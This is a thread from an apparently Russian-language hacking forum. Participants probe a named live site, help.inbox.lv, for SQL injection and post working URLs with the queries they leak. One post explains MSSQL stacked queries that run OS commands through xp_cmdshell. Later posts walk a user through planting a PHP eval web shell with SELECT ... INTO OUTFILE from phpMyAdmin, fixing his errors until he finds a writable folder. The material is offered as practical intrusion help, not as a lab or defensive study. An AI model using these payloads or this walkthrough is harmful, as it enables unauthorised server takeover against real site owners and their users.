Первое, что приходит в голову: можно через reverse ip узнать на сервере другие сайты, а по этим путям попробовать через другой сайт пролезть.
Наркоман? Возьмём ошибку. Error pulling cat information from database: (SELECT cat_na as cat, maincat FROM cfaq_cats WHERE catid = 24) Unknown column 'cat_na' in 'field list' Я в GET подставил na, получилось cat_na, т.е. такой колонки нету в базе данных. А что тогда это? XSS?
это скуля ,но там стоит ограничение на длину параметра $_GET['language'] ,и если его значение > 2x ,символов => оно обрезается. Примерно таким образом: PHP: $a=substr($_GET['language'],0,2);
Я это указал в своём посте. Человек спросил про скулю? Я ему ответил, что это "как бэ" скуля, но с ограничением в 2 символа. А DrAssault говорит что это не скуля.
Что не понятно это НЕ скуля! Что есть скуля?! Это, как минимум возможность повлиять на запрос в своих целях, то есть извлечение данных и т.д. Что мы имеем тут?! Для этого надо разобраться, почему же возникает ошибка... а возникает она именно потому, что значение переданное через гет параметру language не соответствует колоночкам в БД из которых идет выборка, то есть к примеру выборка из колонки cat_ru даёт один резалт (страницу на русском языке), а cat_en другой результат, что логично, так как выборка возможна, такие поля существуют, а ошибка происходит именно потому, что в качестве значения вы подсовываете параметру лажовое значение... А вот теперь вопрос! Внимание... есть ли у нас возможность повлиять на ход запроса?! ЗЫ Ctacok, умничать в болталку со своими гениальными шутками!!! Начинаешь действовать на нерву...
Головой подумай ога, я тебя не оскорблял. Во вторых он спросил насчёт скули, я ему ответил, и ты тут валазиешь из тумана.
Сэнкью вэри мач, я так рад, так рад, что ты меня ещё и не оскорбил Ну, во-первых, не из тумана, это форум и тут имеют право отписываться абсолютно все, а во-вторых, я ответил по сабжу, ты с чем то не согласен?
Так, ты сказал что "скуля" это влияние на SQL запрос? Здесь есть влияние на SQL запрос, т.е. Данное значение берётся из GET запроса language. Я влияю на SQL запрос, просто меня ограничивает скрипт до 2-х знаков. Что ещё доказать надо? Можно уже и не враждовать, кроме - в репу мы нечего здесь неполучим.
Да. думаю пора заканчивать. Это спор о терминологии. и случай скорее выпадает из классификации, так что истина где-то рядом : С одной стороны мы можем внедрить в запрос 2 символа, тоесть инъекция на лицо, а с другой стороны, влиять на запрос мы не можем. Тоесть если мы не можем передать базе верное наше выражение, а можем только вызвать ошибку наверное об иньекции речи быть не может Вобщем не сходите с ума, правы оба по своему. А флейм прекращайте. ===================== Там кстати ещё и двойной запрос , но это дела не меняет, хотя если есть такие косяки, может быть и нормальная скуль найдётся, я не особо смотрел http://help.inbox.lv/index.php?catid=111111&language=23 (SELECT cat_23 as cat, maincat FROM cfaq_cats WHERE catid = 111111) http://help.inbox.lv/index.php?catid=%00&language=3434 (SELECT catid, cat_34 as cat, description_34 as description FROM cfaq_cats WHERE maincat = 0 ORDER BY prio ASC)
Преимуществом этой СУБД есть то, что в скулях можно закрывать один запрос ( и выполненять другой... Поясню: Если есть уязвимый код, н.п.: PHP: mssql_query('SELECT * FROM news WHERE id='.$_GET['id'].); При подставке в id, н.п. 1, запрос в БД будет выглядеть так: Code: SELECT * FROM news WHERE id=1 Это понятно Но можно сделать так: Code: ?id=1; exec master..xp_cmdshell 'здесь комманда консоли винды' тогда первый запрос будет Code: SELECT * FROM news WHERE id=1 второй: Code: exec master..xp_cmdshell 'здесь комманда консоли винды' Про "exec", "master..xp_cmdshell" почитай в гугле PS: Но exec не всегда разрешен. В большинстве случаев - только при пользователе "su" (это как root в MySQL)
Всем привет,такая проблема: Есть рут от пхпадмина phpMyAdmin 2.6.2-Debian, Выполняю запрос: Code: select '<?php eval($_GET[e]); ?>' into outfile '/var/www/new/pma/1.php' получаю Code: SQL-запрос: Документация SELECT '<?php eval($_GET[e]); ?>' INTO OUTFILE '/var/www/new/pma/1.php' Ответ MySQL: Документация #1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 пути правельные из пхпинфо взял. Зарание спасибо
krypt3r спасибо уже что то , Code: SQL-запрос: Документация SELECT '<?php eval($_GET[e]); ?>' FROM db INTO OUTFILE '/var/www/osiatis_new/landesk/ll.php' Ответ MySQL: Документация #1 - Can't create/write to file '/var/www/new/11/ll.php' (Errcode: 13) все равно каким то боком кавычки мешают( jokester выполняю запросы в поле Выполнить SQL запрос(ы) на БД UPD можешь ради интереса попробовать вот так: вылетает Code: #1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 И проверил пользователя root ALL PRIVILEGES К примеру отбросим фильтр кавычек ,и смтря на первую ошибку получается что запись невозможна?
Shadrin Хех, это я протупил, krypt3r прав, у тебя база просто 4, я неподумал. Теперь просто ошибка записи в папку. тоесть прав нет попросту Ищи папку на запись.
Code: Ваш SQL-запрос был успешно выполнен (Запрос занял 0.0661 сек) SQL-запрос: SELECT '<?php eval($_GET[e]); ?>' FROM db INTO OUTFILE '/tmp/1' а тут норм все .. А как быстро найти папку с правами на запись? кроме гугла и сканеров котрые по линкам ходят
нет, это ясно,вопрос был в том что кавычки не ружутся при запись в tmp..вообщем папку надыбыл щас писать будемс всем большое спасибо!